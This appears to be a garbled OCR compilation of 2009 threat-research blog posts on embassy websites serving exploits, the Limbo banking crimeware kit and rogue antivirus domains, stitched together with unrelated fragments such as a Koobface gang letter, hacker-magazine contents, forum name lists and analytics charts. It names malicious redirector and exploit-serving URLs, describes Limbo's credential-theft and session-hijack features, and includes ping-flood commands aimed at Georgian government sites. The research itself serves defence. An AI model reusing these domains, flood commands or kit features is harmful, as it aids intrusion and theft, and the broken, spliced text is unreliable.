$3] 3 200 HTTP ethiopianembassy.org js/main.js 870 = applications... 
> 4 200 HTTP ethiopianembassy.org fcss{home.css 7,366  texticss 

=) 5 200 HTTP ethiopianembassy.org fimages/picl.jpg 410 = image/jpeg 
im) « 200 HTTP ethiopianembassy.org fimages/container-ba2. aif 96 = image/gif 

=) 7? 200 HTTP ethiopianembass 2 image/jpeg 
im} 8 200 HTTP ethiopianembassy ort er-bg2.jpa 94,939 image/jpeg 


Oops, they keep doing it again and again. The web site of the Ethiopian Embassy in Wash- 
ington D.C (ethiopianembassy.org) has been [1]compromised and is currently iFrame-ed to 
point to a live exploits serving URL on behalf of Russian cybercriminals, naturally in a mul- 
titasking mode since the iFrame used to act as a redirector in several other malware campaigns. 


Despite that the iFrame domain (l1tvv .com/index.php) is already "taken care of", details 
on the original campaign can still be provided. Multiple dynamic redirectors with a hard coded 
malware serving domain are nothing new, thanks to sophisticated traffic management kits 
allowing this to happen. The mentality applied here is pretty simple and is basically mimicking 
fast-flux as a concept. 


With or without one of the redirection domains, the campaign keeps running like the fol- 
lowing: us18.ru/@/include/spl.php (91.203.4.112) as the hard coded malware serving domain 
within the mix, is currently serving Office Snapshot Viewer, MDAC, Adobe Collab overflow 
exploits etc. courtesy of web malware exploitation kit (Fiesta). Traffic management is 
done through trafficinc .ru and trafficmonsterinc .ru also parked at 91.203.4.112 with 
[2]Win32.VirloolObfusca served at the end. 


Related posts: 

[3]USAID.gov compromised, malware and exploits served 
[4]Azerbaijanian Embassies in Pakistan and Hungary Serving Malware 
[5]Embassy of India in Spain Serving Malware 

[6]Embassy of Brazil in India Compromised 

[7]The Dutch Embassy in Moscow Serving Malware 

[8]U.S Consulate in St. Petersburg Serving Malware 

[9]Syrian Embassy in London Serving Malware 

[10]French Embassy in Libya Serving Malware 


. http://www. sophos.com/security/blog/2009/03/3564. htm 
. http://www. virustotal.com/analisis/ff£217d70312ff26f 48bdaef9e66b6c5 
. http://blogs.zdnet.com/security/?p=281 


. http: //ddanchev. blogspot .com/2009/03/azerbai janian-embassies-in-pakistan-and.htm 


ttp://ddanchev. blogspot .com/2008/11/embassy-of-brazil-in-india- compromised. htm 


. http: //ddanchev. blogspot .com/2008/01/dutch-embassy-in-moscow-serving-malware.htm 
. http: //ddanchev. blogspot .com/2007/09/us- consulate-st-petersburg-serving.htm 
. http: //ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2009/01/embassy-of-india-in-spain-serving. htm 
6 
7 
8 
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Security Portal,Unique Products And Services 
This is Frames Security Systems 
A Mast Visit For Everyone Laterested la Computer Security 


UPDATED!!! The Complete Windows Trojans Paper -UPDATED!!! 
Unique Publication That Will Answer You All The Questions You've Ever Had About Windows Trojans.How They Work.How To Protect.How You Get Infected. 
If You're Interested In Reading More Publications Subscribe In The Newsletter You'll Find When Visiting The Publications Page. 


Most Downloaded Files: 
exbounce.tar.gz 
messala tangs 
amaplge 
py BNC2.22.tang: 
The Best E-Book On Linus Basics I've Ever Read Online!!! 
Trojans Worms VBS Archive 


Ene E-books Archive —CLICK AGAIN TO ACCESS THE E-BOOKS! 
Exee E-books Archive 2 ~CLICK AGAIN TO ACCESS THE E-BOOKS! 


Support Me And Vote For That Site If You Found What You Were Looking For Or Find It Interesting 
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= team, s0 often called “Koobface Gang", expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


. 
. 
° 


Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware: 

Trend Micro (httpi//trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool docurnent (with three parts!) describing all our mistakes we've ever made; 

Cisco for their 3rd og to our software in their annual “working groups awards"; 

Soren Siebert with his 

Hundreds of users who | us logs, crash reports, and wish-lists. 


In fact, it was a really hard year, We've made many efforts to improve our software, Thanks to Facebook's security tearm - the guys made us 
move ahead, And we've moved, And will move. Improving their security system, 


By the way, we did not have « cent using Twitter's traffic. But many security issues tell the world we did. They are wrong. 


As many people know, “virus” is something awful, which crashes computers, steals credential inforrmation as good as all passwords and credit 
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data, And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it 1) 


Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang™. 
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5.3.7 Crimeware in the Middle - Limbo (2009-03-19 18:59) 


@) Tock wpaxeeen mame C)Kesonet © Clamcneasapaxesel ~ Mowcke morax ~ Antorexx ~ Hactpoieat 


Limbo admin panel 


While you were out - "[1]Cybercrime-as-a-Service is finally taking off" and a $400 will get you 
in the hacking business. Such a mentality speaks for an outdated situational awareness. 


Cybercrime as a service originally started in the form of "value-added" post-purchase 
services, the now ubiquitous lower detection rate management for a malware binary, and 
anti-abuse domain hosting for the command and control interface, several years ago. As far 
as the $400 required as an entry barrier into cybercrime no longer exists. In reality, pirated 
copies each and every web malware exploitation kit including the proprietary crimeware kits 
are becoming more widespread these days. 


The cybercrime economy has not only matured into a sophisticated services-driven mar- 
ketplace a long time ago, but also, nowadays we can clearly see how standardizing the 
exploitation approach is inevitably resulting in efficiencies - think web malware exploitation 
kits with diverse exploits sets and massive SQL injection attacks. The underground economy is 
in fact so vibrant, that the existing monoculture on the crimeware front is already [2 ]allowing 
cybercriminals to hijack the crimeware botnets of other cybercriminals unaware of the fact 
that they’re running an oudated copy of their kit. 


Followed by Zeus and Adrenalin, it’s time to profile Limbo, an alternative crimeware kit 
that’s been publicly available for purchase since 2007. Interestingly, none of these kits can 
compare to the current market share of Zeus, perhaps the most popular crimeware kit these 
days, a development largely driven by the community build around Zeus, and the major 
enhancements introduced within the kit on behalf of third-party developers. 


Here’s what Limbo is all about: 
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Some results may have been removed under data protection law in Europe. Learn 
more 
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The Complete Trojans Text weneeeee [written On| 
| (Security Related) | 1 
|by the MatiAc |3.04.2000 | 
[contact me at: themaniac@bleckcode.com | -------- [Ptteetetes | 
|maniac@forbidden.net-security.org 

eee eee ee ee 


This guide is for educational purposes only I do not take any responsibility about anything 

happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision. 
If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't 
change anything without the permission of the author.I"ll be happy to see this text on other pages too. 


All copyrights reserved.You may destribute this text as long as it's not changed. 


Oe ee ee ee ee ee ee ee 


Author Notes: 


I hope you like my texts and find them useful. 

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like 
“I want to hack the US government please help me” or “Tell me how to blind a trojan into a .jpg” 
“Were can I get s portscanner™ etc...... 

Ge sure if I can help you with something I will do it. 

I've started writing security related tutorials and I hope you like that.I‘ll try to cover 

much more topics in my future texts and I want to thank to all of the people that like ay 

texts. 


Pee ee Pee Pe ee Pe er re oo 


Here you can find other texts \ 
written by me or other friends: \ 
http: //imanr.blackcode.com / 
blacksun.box.sk / 
neworder .box.sk / 


-1.What Is This Text About? \ 
-2.What Is A Trojan Horse \ 
-3.Trojans Today \ 
|-4.The future of the trojans \ 
-5.Anti-Virus Scanners \ 
-6.How You Can Get Infected? \ 


|-7.How Dangerous A Trojan Can 5e? \ 
~8.0ifferent Kinds Of Trojans \ 
wees! Remote Access Trojans \ 
+----! Password Sending Trojans \ 


~9.Who Can Infect You? \ 
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Astalavista Security Group Security Training - 
Basics of OPSEC 


Explore the Basics of OPSEC 
oy Denia Dench aes) 


COURSE DETAILS 
Highlights = # # j= — — — — — — — —_ topresent to general avavia 
v Ovenie < e e 
ve 
Y . 
v In pre 
Vv Int Fut 
Certificate Level Language 
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€)Nouck apaxeweciamn €/Koumea: © Cranecnmasapaxemst — Mewcke morax — Astononcxe ~— Hacmpodnat 


Limbo admin panel 


heten sil oon 
oabaré of 
Mhemetatanih sdecu sem 
marl orege p 
maatheodat com 


satbenslitty com 
Atlinehachits Sate halite care 
atnthe tied gibt coe 


"It works on the principle of the add-in to Internet Explorer, not visible in the processes to 
make the logs being hidden from the firewall redirector, and other programs to monitor 
network activity. Supplied as a loader, which is removed after the launch, unpacks itself and 
make all necessary entries in the registry. When you first start IE it cleans Cookies, reads 
Protected Storage (Autosaved passwords in IE, Outlook passwords, etc.) Whenever a user 
visits the monitored sites, Limbo intercepts the parameters which are later on transmitted to 
the server once the user presses the browser key. 


Cr Newck wenn uae CMe © Crancneasapaxenmmt — Noucxe norax “ Asremeeck ~ Hacrpeiaat 


Limbo admin panel 
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Team, Security, Hijack, Ir... (5) 


we a se 


Hacker, Kazi_root, Mute...(5)) Aref, MSN-HACKER, Sha... (6) 


we He 


Dr.Pantagon, Terminato... (6) OS, Cca, Mr.Bami, Solt6n (5) Dedmaster, Number 14, T... (4) 


Amob07, M4st3r_4wa4r3.... (4) SaMiR, Karaji_kt21, Sianor (4) 
Anti, BrainBoy, PUNISHER (4) 
_ ArMaN, Cyber, Invisible (4) ( Team, Security, xXx, AR3... (3) 


D4rk_Knight, Devilzcode... (2) Team, Security, xXx, AR3... (2) 


Dani.love666, ESSAJI, Or... (3) H3X73L, inJenious, Rem... (3) 


Msu360, Ali, ERROOR, D3...(6)) IRaNHaCK, GHOST, Infoh... (6) 


DewilZ, TM, Dr.Root, MoH... (6) 


Team, Cocain, Loooooord (3) Rootqurd, Sootak, Tink3r (3) Team, Security, SHIA (4) 


“other Topies (1) 
vy ’ 
ADUNA 
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Commands: 

- Update the binary 

- Launch arbitrary exe file 

- Update configurator (xml file available) 

- Cleaning Cookies 

- Remove Limbo 

- Theft of keys for Bank of America, as well as the keys of those banks that have moved to a 
system of keys 

- Exclude all the keys for Bank of America, as well as other banks of keys (control questions 
asked again, and you can intercept the answers to them) 

- Add to your hosts - to block a certain site (it seems as if it does not boot at all) 

- Reboot Windows 

- Destroy Windows 


€/ Tek mpaxewen vam €)Keueus w Cramcnm sapaxemdit —Meuckanorax — Antomouck — Hactpoima 


Limbo admin panel 


Save 


Manage users 


2 ute tatu rode 
RY CA ddEBddecSabds754068 Pood active =} root =} update | Ovlete 


Add new user 


wien =] 
ative =] 


Add 


Main features: 

- Grabs data from forms, including data around forms (all in a row or a pattern described in 
the configuration file) 

- Logging of keystrokes in the browser, at the time when the user enters something in the edit 
form (it is sometimes useful - for example when the entered data is encrypted after submit 
form) 

- Logging of virtual keyboards (universal technology was developed for the Turkish and 
Australian banks) 

- Theft of keys (Bank of America, as well as other banks, whose protection is key-based) - are 
in the archive, the archive is created from the user on the computer. 

- Delete key (Bank of America, as well as other banks, whose protection is built based on keys) 
- itis useful to force the user to enter answers to security questions 

- Scam page redirection (the fake of same page with the substitution of the address bar of IE 
and the status bar on infected hosts) 

- Harvesting of emails (including the address book user) - by request includes this possibility 

- Set the filter for sites that do not need to intercept 

- Simple injects-based system (paste your text input field on a particular site - for example, to 
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_DevilZ, TM, Alipc1, Infoho... (5) 


Cyber, Dr.Pantagon, H3X... (5) Cca, D3stroyer, inJeniou... (6) MoHSenSunBoOy, MSN-H... (5) 


Team, Security, Aref, GH... (6) Kazi_root, Original-Hack... (6) Hacker, M4st3r_4w4r3, ... (5) 


Mr.Bami, Rootqurd, Tink... (5) BOY, ErRor, H3LL, MoHa... (5) Amob07, Number 14, PU... (5) 


Team, Security, xX, AR3...(2) ) (Team, Security, xX, AR3... (2) 
vw 


Team, Security, XXK, AR3... (3) Team, Security, xX, AR3... (2) 


ArvinHacker, Karaji_kt21... (3) D4rk_Knight, SaeedSaa... (3) Dedmaster, Delta, Dr.Root (3) 


OS, DALTONS, DevilzcOd...(3) | DangerMan, NobOdy, Re... (3) 


Kk, ARSS, Group (5) 


Anti, DiaGraM, Shakh (3) Other Topics (1) 
@ ° 
ADUNA 
[404] 
Aggregate Item Use Show stats for [alltime >| 
40000 
30000 
20000 
10000 
0 
2010 2015 


Wednesday, December 14, 2005 — Saturday, September 14, 2019 


* 2,572,020 views of 1038 items 
° 6,497,440 ClicKS back to the site on 1217 items 
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| 
MMA Fpy2uu ping -n 5000 -| 1000 www.mfa.gov.ge -t 
MBX [pysuu ping -n 5000 -I 1000 www.police.ge -t 
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Da ncho Danchev), 


ask for a pin Holder) 

- Smart injects system - blocking form until user input is not injected into the data fields 
(checking for the count-woo characters of their type - the numbers or letters) 

- TANs grabbing - vital for the German sites 


Paid only features: 

- A hidden transfer (transfer of command from the admin panel) - HARD-sharpen under one 
bank 

- Autocomplete of hijacked session (eg when a user makes a transfer, useful if the transfer 
requires the SMS confirmation. Strictly tied to a particular bank only. 


Nloncs apace €)Kouaabt © Cramcrma sapaxema ~ Moncks merax ~ Astonouck ~~ Hactpoiiat 


Limbo admin panel 


paypal com 


eee CAO8 ome login_emad Jogin pass, 


vance » 
xno mona ») 


~ ALL Bal Search | 


PHP based admin includes: 

- Mapping of users to the admin 

- Directing teams selected users 

- Delete commands and users 

- Showing the status of the command 
- Mapping and IP users 

- Ability to delete tax 

- Display the size of logs 

- Search for logs 

- Archiving of logs 

- Filter by country 

- Possibility of sending logs to email 
- Statistics on infection 

- View collected emails 
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- The giving of the notes selected users 

- The last call 

- Displaying a page by page (say 200 records per page) 

- An opportunity to log everything in one file (optional) 

- Sorting of logs according to different criteria 

- Delete all logs 

- Have the opportunity to log into mysql, as well as the ability to search for him there is (an 
order of magnitude faster search) 


These commands are downloaded to the host after a certain period of time and performed 
in the admin panel you can see the status of commands for a specific user - download \ 
downloaded but not executed \ implemented." 


With crimeware in the middle, no SSL/two-factor based authentication can ensure a non- 
transparent to the eyes of the cybercriminal transaction. 


Related posts: 

[3]Crimeware in the Middle - Adrenalin 

[4]Crimeware in the Middle - Zeus 

[5]76Service - Cybercrime as a Service Going Mainstream 

[6]Zeus Crimeware as a Service Going Mainstream 

[7]Modified Zeus Crimeware Kit Gets a Performance Boost 

[8]Modified Zeus Crimeware Kit Comes With Built-in MP3 Player 

[9]Zeus Crimeware Kit Gets a Carding Layout 

[10]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw[11] 


http://www. itnews.com.au/News/98524, cybercrimeasaservice-takes-off.asp 


http: //ddanchev.blogspot .com/2009/02/help-someone-hi jacked-my- 100k-zeus. htm 


http: //ddanchev.blogspot.com/2009/02/crimeware-in-middle-adrenalin. htm 
http: //ddanchev.blogspot . com/2008/08/76service-cybercrime-as-service-going. htm 
http: //ddanchev.blogspot .com/2008/12/zeus-crimeware-as-service-going.htm 


http: //ddanchev. blogspot .com/2008/11/modified-zeus-crimeware-kit-gets.htm 


http: //ddanchev.blogspot . com/2008/09/modified-zeus-crimeware-kit-comes-with.htm 


0 OY OE Ne 


http: //ddanchev.blogspot. com/2008/11/zeus-crimeware-kit-gets-carding-layout .htm 
10. http://ddanchev. blogspot .com/2008/06/zeus- crimeware-kit-vulnerable-to.htm 
11. http://ddanchev. blogspot .com/2008/04/crimeware-in-middle-zeus .htm 


5.3.8 Embassy of Portugal in India Serving Malware (2009-03-25 23:08) 


embportindia.co.in } 
coolnameshop.cn fin, cgi?income23 
ntkrnipa.cn rc} 


freewebhostquide.com index.php 


freewebhostguide.com fcachefreadme.pdf 9, application/... 


freewebhostquide.com _/cachejflash. swf application... 
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Top Referrers Absolute numbers ~ 


& www.google.com 112K 
6 ddanchev.blogspot.com 38.3K 
a) feeds.feedburner.com 37K 
@ _feedproxy.google.com 16.8K 
@ too 16.6K 
Q biaogingsoso.com 16.3K 
S www.google.co.uk 14.4K 
@ www.zdnet.com 11K 
@ www.webroot.com 8.15K 
© Other 5.09M 
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-={ BlackCode Ravers Magazine Issue 2 }=- 
Home page : http://www. blackcode. com 
Editor of the magazine: tHe mAniAc 
themani ac@blackcode. com 


Table of Contents: 


L.Editorial 

2.Mirrors of the magazine 

3.Latest News With BlackCode Ravers 
4.How to break your school security 
5.About virii 

6. Advertising 

7.Trojans Section 

8.For the newbies 

9.Linux Section 

LO. Interviews 

11.Final words 


It's gf! eh is our second issue.I've changed the 

design I've added several new things in the newsletter. 

I've also received a lot of e-mails about our magazine. 

People like it and they want more information here. 

The first issue was short one but of course every new 

issue has many new things added in it. 

[I'm happy people like it and we have MANY new subcribers every day. 
Also we have much more visitors than before. 
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Yet another embassy web site is falling victim into a malware attack serving Adobe exploits to 
its visitors. As of last Friday, [1]the official web site of the Embassy of Portugal in India has 
been compromised (embportindia.co.in). Who’s behind the attack? Interestingly, that’s the 
very same group that compromised the [2]Azerbaijanian Embassies in Pakistan and Hungary 
earlier this month. Assessing this campaign once again establishes a direct connection with 
the Rusian Business Network’s pre-shutdown netblocks and static locations. 


The very same domain using the same web traffic redirection script, used in the malware 
Campaigns at the Azerbaijanian Embassies in Pakistan and Hungary, can be found at the Por- 
tugal embassy’s web site. betstarwager .cn/in.cgi?cocacola84 redirects to ghrgt.hostindianet 
.com/index.php?cocacola84 (94.247.3.151) where [3]Multiple Adobe Reader and Acrobat 
buffer overflows are served : 


zzzz.hostindianet .com/load.php?id=4 -> ghrgt.hostindianet .com/cache/readme.pdf 
zzzz.hostindianet .com/load.php?id=5 -> ghrgt.hostindianet .com/cache/flash.swf 


The second iFramed domain ntkrnipa .cn/re/ (159.226.7.162) has a juicy history linking 
it to previous campaigns. In [4]February, 2008, an anti-malware vendor’s site (AvSoft 
Technologie) was iFramed with the iFrame back then (ntkrnipa .info/rc/?i=1) pointing to the 
Russian Business Network’s original netblock It gets even more interesting when you take into 
consideration the fact that ntkrnipa.info was also sharing ifrastructure with zief.pl, among 
the [5]most widely abused domains in the recent [6]Google Trends keywords [7]hijacking 
campaigns. Zief.pl is also service of choice for certain campaigns of the [8]Virut malware 
family, irc.zief.pl in particular. 


It gets even more malicious considering that on the same IP (ntkrnipa .cn/rc/ 159.226.7.162) 
where one of the malware domains in the embassy’s campaign is parked, we can easily 
spot domains (baidu-baiduxin3 .cn for instance) that were participating in last year’s [9]IE7 
massive zero day exploit serving campaign. Moreover, in a typical multitasking stage, the 
cybercriminals behind the campaign are also hosting [10]Zeus crimeware campaigns on it. 


A reincarnation of a well Known RBN domain, confirmed participation at related compro- 
mises of embassy web sites by the same group, sharing ifrastructure with domains from a 
massive IE7 ex-zero day attack and hosting Zeus crimeware command and control locations 
-underground multitasking at its best. 


Related posts: 

[11]Ethiopian Embassy in Washington D.C Serving Malware 
[12]USAID.gov compromised, malware and exploits served 
[13]Azerbaijanian Embassies in Pakistan and Hungary Serving Malware 
[14]Embassy of India in Spain Serving Malware 

[15]Embassy of Brazil in India Compromised 

[16]The Dutch Embassy in Moscow Serving Malware 

[17]U.S Consulate in St. Petersburg Serving Malware 

[18]Syrian Embassy in London Serving Malware 

[19]French Embassy in Libya Serving Malware 


1. http: //securitylabs.websense.com/content/Alerts/3326.aspx 
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ttp://ddanchev. blogspot .com/2008/02/anti-malware-vendors-site-serving.htm 
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ttps://zeustracker.abuse.ch/monitor.php?ipaddress=159.226.7.162 


ttp://ddanchev. blogspot .com/2009/03/ethiopian-embassy- in-washington-dc.htm 


12. http://blogs.zdnet.com/security/?p=281 


ttp://ddanchev. blogspot .com/2009/03/azerbai janian-embassies-in-pakistan-and. html 
ttp://ddanchev. blogspot .com/2009/01/embassy-of-india-in-spain-serving. htm 


ttp://ddanchev. blogspot .com/2008/11/embassy-of-brazil-in-india-compromised.htm 


16. http://ddanchev. blogspot .com/2008/01/dutch-embassy- in-moscow-serving-malware. htm 
17. http://ddanchev. blogspot .com/2007/09/us- consulate-st—petersburg-serving. htm 
18. http://ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving. htm 


ttp://ddanchev. blogspot .com/2007/12/have-your-malware-in-timely-fashion.htm 
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PopupNukerPro - COMING SOON! 
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XPBooster - COMING SOON! 
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Jer protects your system and 


The following are some of the very latest typosquatted rogue security software domains 
pushed through blackhat SEO, web site compromises, and systematic abuse of legitimate Web 


2.0 services. 


yourstabilitysystem .com (209.44.126.14) 
onlinescanservice .com 

scanalertspage .com 

getscanonline .com 

bestfiresfull .com 

yourstabilitysystem .com 
mostpopularscan .com 

vistastabilitynow .com 

scanvistanow .net 

vistastabilitynow .net 


central-scan .com == (212.117.165.126) Maureen 
lanjr@googlemail.com 

royalsoftwareupdate .com 

uptodate-protection .com 

updatesoftwarecenter .com 

webscannertools .com 


2152 


Whelan 


Email: 


maureenwhe- 


[470] 


21496 


[471] 


21497 


[472] 


21498 


[473] 


21499 


[474] 


21500 


oe. 


matt aw 


[475] 
21501 


protectprivacy18 .com (209.249.222.48) Arnes Skopec Email: arnessl2370@gmail.com 
malwarescanner20 .com 

antispyscanner13 .com 

privacyscanner15 .com 

easywinscanner17 .com 

systemscanner19 .com 


malwaredefender2009 .com (67.43.237.75) Josef Branc Email: jsfsl2341@googlemail.com 
systemguard2009 .com 
systemguard2009m .com 


angantivirus-2009 .com (70.38.73.26) 
angantivirus2009 .com 


check-ms-antivirus .com (78.26.179.131) Brett Quihuiz Email: BrettQuihuiz@gmail.com 
ms-loads-av .com (78.26.179.137) Hou Stephen Email: StepDunnu@gmail.com 
secure-data-group .com (209.8.45.147) Joseph Barnes Email: jnbarnes40@gmail.com 


dimaldef09 .com (67.43.237.78) Josef Branc Email: jsfslI2341@googlemail.com 
disgd3 .com 

getsgd3 .com 

getsysgd09 .com 

getmaldef09 .com 

disg09 .com 

getsg09 .com 
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Who’s on [483]Facebook? Feel free to send me an invitation and let’s catch up. The following 
photos are a personal Facebook photos compilation which you can feel free to go through in 
terms of catching up in terms of what I’ve been up to. 
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gomaldef09 .com (67.43.237.77) Josef Branc Email: jsfslI2341@googlemail.com 
gosgd3 .com 

gosysgd09 .com 

gosg09 .com 


anti-virus-2010-pro .info (70.38.19.201) Ivan Durov Email: idomains.admin@gmail.com 
av2010pro .com 

anti-virus-1 .info 

bestdownloadav1 .info 

antivirus1-site .info 

anti-virus-2010-pro-downloads .info 

anti-virus1-installs .info 


webprotectionreads .com (94.247.3.74) 
stabilitytraceweb .com 
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% of % of % of % of 
Blog covered covered timely robust 
IO0Cs iocterms 10Cs 10Cs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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® Identified Competitors 


. 


Cyber Defense Agency (CDA) 
(US) 

Cyber Security Research and 
Development Center (US) 


* Cyveillance (US) 


Dancho Danchev (EU) 


* Department of Homeland 


Security US-CERT(US) 
Ernst & Young (EU) 


« EWA Information and 


Infrastructure Technologies, Inc. 
(US) 

Fortify (US) 

Global Security Mag (EU) 
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Competitors 


« iDefense Labs (US) 
* JET Intelligent Risk Systems (US) 


Informatica (US) 


* IT—Information Sharing and 


Analysis Center (US) 


« iSIGHT Partners (US) 
* Lookingglass (US) 
* Multi-State Information Sharing 


Analysis Center (US) 


« nCircle (US) 


SecureWorks (US) 
Trend Micro (US) 


United States Cyber 
Consequence Unit (US) 
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% of % of % of % of 


Blog covered covered timely robust 
1OCs iocterms 1O0Cs 10Cs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87 % 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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safetyscanworld .com 
instantsecurityscanworld .com 
thestabilityinternetworld .com 
stabilityexamineguide .com 
scanusonline .com 
websafetynetscan .com 
websafetynetscan .com 
webstabilityscan .com 


[1]Bad, bad, cybercrime-friendly ISPs! 


Related posts: 

[2]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[3]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[4]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[5]A Diverse Portfolio of Fake Security Software - Part Twelve 
[6]A Diverse Portfolio of Fake Security Software - Part Eleven 
[7]A Diverse Portfolio of Fake Security Software - Part Ten 

[8]A Diverse Portfolio of Fake Security Software - Part Nine 
[9]A Diverse Portfolio of Fake Security Software - Part Eight 
[10]A Diverse Portfolio of Fake Security Software - Part Seven 
[11]A Diverse Portfolio of Fake Security Software - Part Six 
[12]A Diverse Portfolio of Fake Security Software - Part Five 
[13]A Diverse Portfolio of Fake Security Software - Part Four 
[14]A Diverse Portfolio of Fake Security Software - Part Three 
[15]A Diverse Portfolio of Fake Security Software - Part Two 
[16]Diverse Portfolio of Fake Security Software 


. http://blogs.zdnet.com/security/?p=2764 
. http: //ddanchev. blogspot .com/2009/02/diverse-portfolio-of-fake-security.htm 
. http: //ddanchev.blogspot .com/2009/01/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security_12.html 


1 

2 

3 

4. 

5. 
6. 

7 

8 

9 


ttp://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_28.htm 
ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_22.html 


ttp://ddanchev .blogspot.com/2008/10/diverse-portfolio-of-fake-security_16.htm 


. http: //ddanchev. blogspot. com/2008/10/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.htm 
ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.html 


12. http://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


15. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
16. http://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
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BNET TECHREPUBLIC | ZDNET 


ZDNet Search 


Home News & Blogs Videos White Papers Downloads Reviews Popular 


Ryan Naraine, Dancho Danchey & Adam O'Donnell 


> Mobile Mass MB mai Alen ME norco il 
Pick a blog category bd 
: P What size ts yo data footp: ; . 
Archive for: March, 2009 © Wha oe: Se the HOT 
© Boost storage utikzaton via data Spo 
March goth, 2009 de-duplication 
It's been real, it's been fun... © See how multiple file versions enpact Product 
data quality Spotlight 
Categories: © Your chen e: Immediate or deferred Find out whet these 
Tags: de-duping tech products mean 
for the business 
ee ee bottorn line at the 
ghey 2 TalkBacks - ~ ao 6 2 +7 : TechRepublic Product 
Spotlight Blog 
EMC 
As of tomorrow, my tenure with ZDNet comes to an end. eters etengmas ben 
Read the rest of this emry 
March 30th, 2009 Con nect 
. - — + 
Inside BBC's Chimera botnet with peers Deli Studio Hybrid 
Pc 


Categories: Anti Views, Dotnets, Grower ackers, Malware 
Tege: Grits Brogdcasting Corp, Malwa mera Botnet, Spymare, Adware & 


The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for March. You can 
also go through previous summaries for [2]February, [3]January, [4]December, [5]November, 
[6]October, [7]September, [8]August and [9]July, as well as subscribe to my [10]personal RSS 
feed or [11]Zero Day’s main feed. 


Notable articles include: [12]Inside BBC’s Chimera botnet and [13]Study: IE8’s SmartScreen 
leads in malware protection. 


01. [14]Conficker worm to DDoS legitimate sites in March 

02. [15]Bad, bad, cybercrime-friendly ISPs! 

03. [16]Google downplays severity of Gmail CSRF flaw 

04. [17]USAID.gov compromised, malware and exploits served 

05. [18]lnternational Kaspersky sites susceptible to SQL injection attacks 
06. [19]New study details the dynamics of successful phishing 

07. [20]BBC team buys a botnet, DDoSes security company Prevx 

08. [21]Comcast responds to passwords leak on Scribd 

09. [22]Diebold ATMs infected with credit card skimming malware 

10. [23]Ex-botnet master hired by TelstraClear 

11. [24]Study: IE8’s SmartScreen leads in malware protection 

12. [25]Scareware meets ransomware: "Buy our fake product and we'll decrypt the files" 
13. [26]lnside BBC’s Chimera botnet 
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. http://blogs.zdnet.com/securit 
. http: //ddanchev. blogspot .com/2009/03/summarizing-zero-days-posts-for.htm 


ttp://ddanchev.blogspot.com/2009/02/summarizing-zero-days-posts-for- january. htm 


. http://ddanchev. blogspot .com/2009/01/summarizing-zero-days-posts-for.htm 


_ http: //ddanchev blogspot . com/2008/12/summar izing-zero-days~posts-for html 

. http: //ddanchev. blogspot . com/2008/11/summarizing-zero-days-posts-for-october. html 
_ http: //ddanchev. blogspot . com/2008/10/summar izing-zero-days-posts-for. html 

. http: //ddanchev. blogspot . com/2008/09/summarizing-zero-days~posts-for-august -htm] 


ttp://ddanchev.blogspot.com/2008/08/summarizing-zero-days-posts-for-july.htm 
ttp://updates.zdnet.com/tags/danchotdanchev.htm1?t=0&s=0&0=1&mode=rss 

11. http://feeds.feedburner.com/zdnet/securit 

12. http://blogs.zdnet .com/security/?p=304 

13. http://blogs.zdnet .com/security/?p=298 

14. http://blogs.zdnet .com/security/?p=2754 

15. http://blogs.zdnet .com/security/?p=2764 

16. http://blogs.zdnet .com/security/?p=277 

17. http://blogs.zdnet .com/security/?p=281 

18. : ?p= 

19. http://blogs.zdnet . com/security/?p=2846 

20. http://blogs.zdnet .com/security/?p=2868 

21. http://blogs.zdnet.com/security/?p=2900 
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5.3.11 Diverse Portfolio of Fake Security Software - Part Seventeen (2009-03-31 17:58) 
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03. The basics of Social engineering........-.ceeceerecs by 
04. How to make anarchy for beginners.........cceeeeeees by 
OS. Wow to hack for fur. coscccsccccvcscccesccccccccccens by 
06. The ultimate guide to getting a girlfriend.......... by 

7. Exploiting the scene for fun and profit............. by 
